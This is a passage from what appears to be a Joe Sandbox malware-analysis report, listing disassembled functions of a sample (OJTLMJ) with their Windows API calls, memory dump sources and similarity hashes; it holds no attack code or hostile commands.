                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00D99B90
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D99B9F
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00D99C0C
                                                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00D99C51
                                                                                                                • _memmove.LIBCMT ref: 00D99D10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1718709218-0
                                                                                                                • Opcode ID: beead062d8a6fa084c35c7f5a24c04e16ef5764f8746913004df45bfe26c9e10
                                                                                                                • Instruction ID: e28ac200dad3de263d5657726a3daf52444ad40e66a5e6d66b9d330947d16e62
                                                                                                                • Opcode Fuzzy Hash: beead062d8a6fa084c35c7f5a24c04e16ef5764f8746913004df45bfe26c9e10
                                                                                                                • Instruction Fuzzy Hash: A271BC71508201AFDB10EF68DC95E6BB7E9EB84720F144A2DF556972A1DB30DD04CBB2
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DAB204
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: a19030407b761cb0fa9ff68b9ba98d0025227b4438f5ce21a16cb35e880874a1
                                                                                                                • Instruction ID: ebd7040ab352fedceb32ea7e25ced504753bd3da733dd0cf3e20fa3b41f39dbf
                                                                                                                • Opcode Fuzzy Hash: a19030407b761cb0fa9ff68b9ba98d0025227b4438f5ce21a16cb35e880874a1
                                                                                                                • Instruction Fuzzy Hash: BD518E30600305BEEF249B298C99F9E3B65EB07374F244113F955EA2A2C771E992CB70
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00DBE9EA
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DBEA0B
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DBEA20
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00DBEA3D
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DBEA64
                                                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00D5A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00DBEA6F
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DBEA8C
                                                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00D5A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00DBEA97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268354404-0
                                                                                                                • Opcode ID: f10507350a39dfa3103c528a83edb0b81a64e69b0824b9f1bc1fbdb29fb609c9
                                                                                                                • Instruction ID: ab07293143d619ada07b817e317c2301be5df4d905bd75b79b5e54f032d48c1d
                                                                                                                • Opcode Fuzzy Hash: f10507350a39dfa3103c528a83edb0b81a64e69b0824b9f1bc1fbdb29fb609c9
                                                                                                                • Instruction Fuzzy Hash: B0518770600709EFDF24CF69CC81FAA7BA9AB08751F144229F9469B290D770ED849B70
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00DBE9A0,00000004,00000000,00000000), ref: 00D5F737
                                                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00DBE9A0,00000004,00000000,00000000), ref: 00D5F77E
                                                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00DBE9A0,00000004,00000000,00000000), ref: 00DBEB55
                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00DBE9A0,00000004,00000000,00000000), ref: 00DBEBC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: 36bec507e48350d67a9bf8c4d0c845db19a655c2a19ea317aafed8e349b6b8d9
                                                                                                                • Instruction ID: ef4977db4ef77cc8c91aa258efb9a5746bfedfbdac23e93e4b678d778f4f3bc2
                                                                                                                • Opcode Fuzzy Hash: 36bec507e48350d67a9bf8c4d0c845db19a655c2a19ea317aafed8e349b6b8d9
                                                                                                                • Instruction Fuzzy Hash: 8341C531204781DBDF3557288CC8BAA7B96AB49307F2C086DFC878B561C670E889D735
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA
                                                                                                                  • Part of subcall function 00D87C0C: GetFileAttributesW.KERNEL32(?,00D86A7B), ref: 00D87C0D
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00D87ED2
                                                                                                                • _wcscmp.LIBCMT ref: 00D87EEA
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00D87F03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 4093841705-0
                                                                                                                • Opcode ID: 0d636937f9d55eb1a97b5ba3d1500926166a77951ef2dc9ab2cfbd97b2b18dbc
                                                                                                                • Instruction ID: 5c866e712acd71b69f4d146d9e7a8c25f98af8daa1e977fa1e1652e5762c8718
                                                                                                                • Opcode Fuzzy Hash: 0d636937f9d55eb1a97b5ba3d1500926166a77951ef2dc9ab2cfbd97b2b18dbc
                                                                                                                • Instruction Fuzzy Hash: DB41D0B1804219AACF25EBA4DC45ADDB3BCAF48310F5445EAE505A3141EB35DB89CFB4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D7E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7E158
                                                                                                                  • Part of subcall function 00D7E138: GetCurrentThreadId.KERNEL32 ref: 00D7E15F
                                                                                                                  • Part of subcall function 00D7E138: AttachThreadInput.USER32(00000000,?,00D7CDFB,?,00000001), ref: 00D7E166
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D7CE06
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D7CE23
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00D7CE26
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D7CE2F
                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D7CE4D
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D7CE50
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D7CE59
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D7CE70
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D7CE73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                • Opcode ID: 4c27f3c2d53ff99de4f3ae458082e968f690cf1f090c0bd1c3379e99770813ee
                                                                                                                • Instruction ID: dfda2afd26147a6d8ca7e80b4caf5fc8a3c800060e0a55605cee99954f5b06a1
                                                                                                                • Opcode Fuzzy Hash: 4c27f3c2d53ff99de4f3ae458082e968f690cf1f090c0bd1c3379e99770813ee
                                                                                                                • Instruction Fuzzy Hash: 7011E1B1550B1ABEF7102B608C8EF6A3B2EDB1C754F510429F244AB1E0C9F26C00DEB4
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00D7BC1D,00000B00,?,?), ref: 00D7BFFE
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00D7BC1D,00000B00,?,?), ref: 00D7C005
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D7BC1D,00000B00,?,?), ref: 00D7C01A
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00D7BC1D,00000B00,?,?), ref: 00D7C022
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00D7BC1D,00000B00,?,?), ref: 00D7C025
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00D7BC1D,00000B00,?,?), ref: 00D7C035
                                                                                                                • GetCurrentProcess.KERNEL32(00D7BC1D,00000000,?,00D7BC1D,00000B00,?,?), ref: 00D7C03D
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00D7BC1D,00000B00,?,?), ref: 00D7C040
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00D7C066,00000000,00000000,00000000), ref: 00D7C05A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1957940570-0
                                                                                                                • Opcode ID: d0cbcdfd0c636c0c878ada100377819a1ec144ffe48b8813cf45d3a227b99ade
                                                                                                                • Instruction ID: 3bad060c62f5a19e18b5081af1de9260da3cf60744788aae1b266fe9c6f3a605
                                                                                                                • Opcode Fuzzy Hash: d0cbcdfd0c636c0c878ada100377819a1ec144ffe48b8813cf45d3a227b99ade
                                                                                                                • Instruction Fuzzy Hash: E801BBB5640345BFE710AFA5DC49F6B7BADEB89711F008425FA05DB2A1CA709801CB71
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 0-572801152
                                                                                                                • Opcode ID: fdd4d31ce377b81747728f23bdbef0d1e7f14dbe040ceb888d84d85dd6fe076d
                                                                                                                • Instruction ID: 7a708dc6365265b0a94af1f6b686ef71f849bc8657dea1abdc005a9c0b390a77
                                                                                                                • Opcode Fuzzy Hash: fdd4d31ce377b81747728f23bdbef0d1e7f14dbe040ceb888d84d85dd6fe076d
                                                                                                                • Instruction Fuzzy Hash: 5DE19171A10219AFDF14DF68C881BAE7BB5EF48354F189029F949AB281E770DD45CB70
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$_memset
                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                • API String ID: 2862541840-625585964
                                                                                                                • Opcode ID: ac2c8579b2a682fefdf178a913150327f7a8e1157c8d2a74d97b63090c71a9f6
                                                                                                                • Instruction ID: d6f50c669f79047172de57a0f726e21e6f31623c473eb5c971419ff4ccaed69e
                                                                                                                • Opcode Fuzzy Hash: ac2c8579b2a682fefdf178a913150327f7a8e1157c8d2a74d97b63090c71a9f6
                                                                                                                • Instruction Fuzzy Hash: 32917A71A1021AABDF24CFA4CC44FAEBBB8EF45710F14911AE919AB281D7709945CBB4
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DA9926
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00DA993A
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DA9954
                                                                                                                • _wcscat.LIBCMT ref: 00DA99AF
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DA99C6
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DA99F4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                • String ID: SysListView32
                                                                                                                • API String ID: 307300125-78025650
                                                                                                                • Opcode ID: a58bb3c408b00e0fc4ec5d06ff2ae656bc95c067d8e0cf1647c27bc784894cd3
                                                                                                                • Instruction ID: 936de8fd06efd4b603b2e87972314d6ddc9926b7d3590933315f7c8bc9b33b4c
                                                                                                                • Opcode Fuzzy Hash: a58bb3c408b00e0fc4ec5d06ff2ae656bc95c067d8e0cf1647c27bc784894cd3
                                                                                                                • Instruction Fuzzy Hash: B241BD71A00309AFEF219FA4CC85FEEB7A8EF09354F14442AF589E7291D2759984CB70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D86F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D86F7D
                                                                                                                  • Part of subcall function 00D86F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00D86F8D
                                                                                                                  • Part of subcall function 00D86F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00D87022
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DA168B
                                                                                                                • GetLastError.KERNEL32 ref: 00DA169E
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DA16CA
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DA1746
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00DA1751
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00DA1786
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                • Opcode ID: b53948c78dd4e8a87e5c2fa40688451e4d50c35511cf7597b96027b876235e7a
                                                                                                                • Instruction ID: c099933727f55e424aafe4c33937cb3001fa9366216378682d0ff6d9f7073d26
                                                                                                                • Opcode Fuzzy Hash: b53948c78dd4e8a87e5c2fa40688451e4d50c35511cf7597b96027b876235e7a
                                                                                                                • Instruction Fuzzy Hash: E4418875600202AFDB04EF54CCA5F6DB7A6EF45755F088059F9069F2D2EB74E8088B71
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00D862D6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: 32722a8c479ffbb4b2a9ba85e7f15f06f9ab4aa5c2693827b68de0fc7bc5be95
                                                                                                                • Instruction ID: 40b23e5dec289831daa03c389201e15ecbc59580c5eb658e20083e2366c54166
                                                                                                                • Opcode Fuzzy Hash: 32722a8c479ffbb4b2a9ba85e7f15f06f9ab4aa5c2693827b68de0fc7bc5be95
                                                                                                                • Instruction Fuzzy Hash: CA11B735209357BFD7057B589C42FBA739CDF16774B25006AF641A6282E7E0EA40837C
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00D87595
                                                                                                                • LoadStringW.USER32(00000000), ref: 00D8759C
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D875B2
                                                                                                                • LoadStringW.USER32(00000000), ref: 00D875B9
                                                                                                                • _wprintf.LIBCMT ref: 00D875DF
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D875FD
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00D875DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                • Opcode ID: 494e9eafe42f6da52a76367fcc2bf012f877236ae85c8770d0500a850c60370a
                                                                                                                • Instruction ID: 3ac59ae8a4c962f6bc42357f4d7005711ca14df4d01a5c7ae7f08a4a551af97a
                                                                                                                • Opcode Fuzzy Hash: 494e9eafe42f6da52a76367fcc2bf012f877236ae85c8770d0500a850c60370a
                                                                                                                • Instruction Fuzzy Hash: 0A0162F254030ABFEB11E7A49C89EE7776CD704300F0004A2B745E2141EA749E848B30
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                  • Part of subcall function 00DA3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA2AE7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479070676-0
                                                                                                                • Opcode ID: 3bab046046f2f71e2ac869103642e3fe7f5d6b6b63204d165ed232ce638bf6e9
                                                                                                                • Instruction ID: cd9c5b631601616f81cc4a0b462d8b6dffc3e9eb61ea556839e1786cbf3ff0b5
                                                                                                                • Opcode Fuzzy Hash: 3bab046046f2f71e2ac869103642e3fe7f5d6b6b63204d165ed232ce638bf6e9
                                                                                                                • Instruction Fuzzy Hash: 36916B712042019FCB04EF59C891B6EB7E5FF89310F18841DF996972A1DB35E945CB72
                                                                                                                APIs
                                                                                                                • __mtinitlocknum.LIBCMT ref: 00D6B744
                                                                                                                  • Part of subcall function 00D68A0C: __FF_MSGBANNER.LIBCMT ref: 00D68A21
                                                                                                                  • Part of subcall function 00D68A0C: __NMSG_WRITE.LIBCMT ref: 00D68A28
